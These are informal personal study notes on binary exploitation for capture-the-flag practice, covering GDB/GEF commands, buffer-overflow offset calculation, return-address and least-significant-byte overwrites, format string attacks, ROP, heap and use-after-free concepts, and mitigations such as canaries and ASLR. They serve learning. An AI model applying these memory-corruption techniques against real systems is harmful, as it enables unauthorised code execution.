Binary Exploitation Notes
Just a bunch of notes for me to remember when learning Binary Exploitation, in no particular order, I just write as I go
Before we get started, here are some super sick GDB/GEF commands you gonna want to remember:
x
means examine, this shit needs 2 arguments to work, the location in memory to examine and how to display that memoryo
Display in octal. =x/o
x
Display in hexadecimal. =x/x
u
Display in unsigned, standard base-10 decimal. =x/u
t
Display in binary. =x/t
f
Display in float. =x/f
a
Display in address. =x/a
c
Display in char. =x/c
-
s
Display in string. =x/s
- Example (below displays the EIP register in hexadecimal):
(gdb) x/x $eip
0x8048384 <main+16>: 0x00fc45c7
- Sometimes, the
0x
address you see in the decompiled code will not be the same as the assembly code
- If you click on a function OR VARIABLE IN THE VARIABLE DECLARATIONS, you will see The Stack Layout in the disassembly
-
Stuff like
Stack[-0x43] input
means the offset of theinput
variable is0x43
-
Hovering over
0x
addresses shows more information like the Hex & Decimal value
-
Always need to make sure architecture/endianess is correct when writing exploits. Refer to my Assembly Notes
-
Sometimes, when calculating how many bytes of data are needed to fill up a buffer (or for padding), decimal values may need to be used
(14 was the wrong value, 20 was the correct amount of bytes)
-
Relabelling variables/functions/etc is a good idea, click on one and press “L” to relabel it
-
seach-pattern
in gef andsearch
in pwndbg are very useful, use them.
- See above, the function
gets
has executed and has our input of15935728
(random number inputted). So that means that therip
(return address, because the final gets function is finished so now we areret
‘ing) register is at0x7fffffffdac8
, and the start of our input is0x7fffffffdaa0
. I ransearch-pattern 15935728
in order to find out where my input started on the stack. - Another note, in x64 the saved base pointer is stored at
rbp+0x0
and the saved instruction pointer is stored atrbp+0x8
0x7fffffffdac8 - 0x7fffffffdaa0 = 0x28
byte offset (0x28 = 40 in decimal
), WE HAVE TO WRITE 40 BYTES WORTH OF INPUT AND WE CAN OVERWRITE THE RETURN ADDRESS!!! BASICALLY REDIRECTING THE CODE FLOW TO ANOTHER FUNCTION IF WE WANT!!!- ^^^^^ REMEMBER!!! ^^^^^ Sometimes, when calculating how many bytes of data are needed to fill up a buffer (or for padding), decimal values may need to be used
- Sometimes, exploits will crash on execution due to “The Movaps Problem. This is where a general protection fault is triggered when the
movaps
instruction is operating on unaligned data, aka any timemovaps
isn’t aligned prior to a call. It is alibc
problem that means we need to find a way to align bytes properly. - I solved this by changing the exploit code to use
0x04005ba
, which is 4 bytes away from*give_shell+0
.
- Sometimes libc versions and linkers wont match the program/challenge you are exploiting, you can use
pwninit
andpatchelf
to fix this:
- You should write exploits when trying to do shit, really i got stuck on this easy ass CTF because i refused to write a simple exploit with it, use one as a base for a simple buffer overflow:
- Sometimes when overwriting return addresses in exploits, you will need to jump to the memory address BEFORE the call you want to jump to, for example here i jumped to the memory adddress that was just before the
system
call:
- Grabbing output is important when writing exploits, like this line below:
for i in range(9):
try:
inp = str(p.recvline()[19:].strip())[2:].strip("'") # Get the address from the leak
except:
log.info("")
print("leak is:", inp)
- The above will start the process, and use
for i in range(9)
to travel down to the bottom of the input, then it will useinp = str(p.recvline()[19:]
to travel along to the right of the input, in this case, the leaked mem address is 19 characters along,.strip())[2:]
will strip the start of the input down by 2 characters (not sure why but it exists if you need it), and.strip("'")
removes any extra stuff at the end
real.
- I believe char arrays move up in the stack, therefore calculating offsets for the below stack frame would be as follows:
0x31 - 0x1d = 0x14 bytes
and0x1d - 0x9 = 0x14.
Both offets are0x14
- Also, keep an eye out for char sequences by hovering over
0x
addresses. For example, hovering over0x73303325
shows achar[]
value ofs03%
, and because this is a 32-bit executable the endinness is little, meaning we need to reverse this to%30s
, which ends up giving usdword ptr [EBP + fmt],"%30s"
instead ofdword ptr [EBP + fmt],0x73303325
- Payload building can be done within pwntools also:
- Running said payload can be done in gef/gdb using
r < payload
- This payload specificallyoverwrote the return address with the address of the
easy
function, making us win:
- A quick few notes on Mitigations
- NX aka DEP - The No eXecute or the NX bit (also known as Data Execution Prevention or DEP) marks certain areas of the program as not executable, meaning that stored input or data cannot be executed as code. This is significant because it prevents attackers from being able to jump to custom shellcode that they’ve stored on the stack or in a global variable.
- ASLR - This is the randomization of the place in memory where the program, shared libraries, the stack, and the heap are. This makes can make it harder for an attacker to exploit a service, as knowledge about where the stack, heap, or libc can’t be re-used between program launches. This is a partially effective way of preventing an attacker from jumping to, for example, libc without a leak. Click here to learn more and how to bypass ASLR
-
- PIE - Position Independent Executable (PIE) is another binary mitigation extremely similar to ASLR. It is basically ASLR but for the binary’s code / memory regions
- Relocation Read-Only (RELRO) - Partial RELRO is the default setting in GCC, and nearly all binaries you will see have at least partial RELRO. From an attackers point-of-view, partial RELRO makes almost no difference, other than it forces the GOT to come before the BSS in memory, eliminating the risk of a buffer overflows on a global variable overwriting GOT entries. Full RELRO makes the entire GOT read-only which removes the ability to perform a “GOT overwrite” attack, where the GOT address of a function is overwritten with the location of another function or a ROP gadget an attacker wants to run. Full RELRO is not a default compiler setting as it can greatly increase program startup time since all symbols must be resolved before the program is started. In large programs with thousands of symbols that need to be linked, this could cause a noticable delay in startup time.
- Stack Canaries - Stack Canaries are a secret value placed on the stack which changes every time the program is started. The general idea is, a random value is placed at the bottom of the stack frame, which is below the stack variables where we actually have input. If had a buffer overflow to overwrite the saved return address, this value on the stack would be overwritten. Then before the return address is executed, it checks to see if that value is the same one it set. If it isn’t then it knows that there is a memory corruption bug happening and terminates the program. Stack Canaries seem like a clear cut way to mitigate any stack smashing as it is fairly impossible to just guess a random 64-bit value. However, leaking the address and bruteforcing the canary are two methods which would allow us to get through the canary check.
<__stack_chk_fail@plt>
is probably a Stack Canary- RE: Stack Canaries - For x64 elfs, the pattern is an 0x8 byte qword, where the first seven bytes are random and the last byte is a null byte.
- RE: Stack Canaries - For x86 elfs, the pattern is a 0x4 byte dword, where the first three bytes are random and the last byte is a null byte.
^^^ Examples of Stack Canaries ^^^
For more information on Stack Canary bruteforcing, go here.
-
libc is where standard functions like
fgets
andputs
live. -
While the addresses in a memory space will change, the offset between the addresses themselves will not change
-
Getting an infoleak for certain parts of the memory, like
libc
for example, means that that infoleak is only good for thelibc
region of memory, we cant use that infoleak for areas likestack
orheap
-
Offset/Hex Calculation can be done with Python using
hex(addr1 - addr2)
-
The
info frame
ori f
command can show more information abouttheebx, ebp, and eip registers
- The
search-pattern
command is also very useful for finding input in the stack
- A Format String attack is an alternate form of exploiting programming that doesn’t necessarily require smashing the stack. Instead, it leverages the format characters in a format string to generate excessive data, read from arbitrary memory, or write to arbitrary memory
Example:
```user@si485H-base:demo$ ./format_error “Hello World” Hello World user@si485H-base:demo$ ./format_error “Go Navy” Go Navy user@si485H-base:demo$ ./format_error “%x” b7fff000
- ```%x``` caused the program to output an address on the stack
```user@si485H-base:demo$ ./format_error "%s.%s.%s.%s.%s.%s.%s"
4.??u?.UW1?VS???????unull).(null).?$?U?
user@si485H-base:demo$ ./format_error "%s.%s.%s.%s.%s.%s.%s.%s"
Segmentation fault (core dumped)
-
Using
%s
can also cause crashes as seen above - List of formats:
%d
: signed number%u
: unsigned number%x
: hexadecimal number%f
: floating point number%s
: string conversion-
%n
: printf has a%n
flag. This will write an integer to memory equal to the amount of bytes printed -
Using
%#x
will output0xdeadbeef
instead ofdeadbeef
-
Format String exploits are confusing asf, learn more about them.
-
The GOT Table is a table of addresses in the binary that hold libc address functions
-
Sometimes, random functions may not actually be random, they may be based off of a certain condition, for example. A random number is generated depending on the current TIME, or DATE, or current VARIABLE in memory… This is pretty rare to see, but still worth knowing.
- RAX - Stores function return values
- RBX - Base pointer to the data section
- RCX - Counter for string and loop operations
- RDX - I/O pointer
- RSI - Source Index pointer for string operations
- RDI - Destination Index pointer for string operations
- RSP - Stack (top) Pointer
- RBP - Stack frame Base Pointer
-
RIP - Pointer to next instruction to execute (Instruction Pointer)
- LEAST SIGNIFICANT BYTE OVERWRITES EXIST, AND THEY WORK LIKE THIS:
-
When we looked at the saved return address, we saw that it was equal to
0x8048668
. The function we are trying to call (printFlag
) is at0x8048672
. Since the only difference between the two addresses is the least significant byte, WHICH IS72
AND68
, BECAUSE BOTH THE ADDRESSES HAVE THE SAME FIRST 5 VALUES:0x80486
AND0x80486
, THE LEAST SIGNIFICANT BYTE FOR EACH ADDRESS IS72
AND68
… And because we want to call theprintFlag
function which is at0x8048672
, we need to overwrite that with0x72
bytes at the end to call theprintFlag
function - ANOTHER EXAMPLE:
-
The address that it is initialized to is
0x565556ad
, and the address we want to set it to is0x565556d8
(forprint_flag
). The difference between these two is just the least significant byte. So we can just overwrite the least significant byte to be0xd8
, and that will callprint_flag
. - ROP (Return Oriented Programming) is a technique in exploitation to reuse existing code gadgets in a target binary as a method to bypass DEP
- A Gadget is a sequence of meaningful instructions typically followed by a return instruction
- Usually multiple Gadgets are chained together to complete malicious actions similar to what shellcode would do
-
These are called ROP Chains
- Using
shell
in gdb will pop you back to a shell, and searching for the process withps -aux | grep <processname>
will get you the process ID which you can use withcat /proc/<PROCESSID>/maps
to get linked libraries info proc
in gdb or gef will also show the process ID for you
- You can use
ropper
to search for ROP gadgets
-
When ROPPing, the best thing to do is planning what you want to do and actualizing the plan in bullet points.
-
Keep in mind that our ROP chain consists of addresses to instructions, and not the instructions themselves. So we will overwrite the return address with the first gadget of the ROP chain, and when it returns it will keep on going down the chain until we get our shell
-
ROPgadget is also a good tool to use to look for ROP gadgets, probably better than ropper
- Sometimes, searching in HEX values is required for
search-pattern
- Using python to get PLT and GOT addresses is also useful:
- Now we talking about the HEAP!
- Heap is a pool of memory used for dynamic allocations at runtime
malloc()
grabs memory on the heapfree()
releases memory on the heap
-
Heap is slower, and manual, whereas the Stack is faster, done by the compiler,
-
Bytes on the heap are fucking weird, but
malloc(8)
is still an 8 byte buffer
- Heap grows DOWN to higher memory, Stack grows UP to lower memory
- Heap overflows are basically the same as Stack overflows
- Heap Canaries/Cookies do not exist
- Dangling pointers are left over pointers in code which reference to free’d data and is prone to being re-used.
- Since the memory it was pointing at was free’d there is no guarantees on what data is there now.
- Memory corruption not required to exploit UAF, it is simply an implementation issue
-
UAF only exists through certain states of execution
-
Usually only found through crashes
-
Heap Spraying, a technique used to increase exploit reliability, by filling the heap with large chunks of data relevant to the exploit you are trying to do
-
Heap Spraying can help bypass ASLR
-
Heap Spraying on 64bit can’t really be used to bypass ASLR
-
Metadata Corruption exploits involve corrupting heap metadata in a way that allows you to use the allocator’s internal functions to cause a controlled write of some sort
-
This generally involes faking chunks and abusing different its different coalesent or unlinking processes
-
Metadata exploits are hard to pull off due to heaps being fairly hardened on modern OS’s
-
Quick note, see below, the registers area in gdb can be used to check if inputs or values in registers are within the Heap or not (see the
$rsi
address highlighted in green, it is0x00005555556036b0
- Then below, after running
vmmap
, we can see that the Heap starts at0x0000555555603000
and ends at0x0000555555624000
-
Because
0x00005555556036b0
is between the start and end addresses of the heap, we know that the value in the$rsi
register is within the heap -
Malloc will reuse previously freed chunks if they are the right size for performance reasons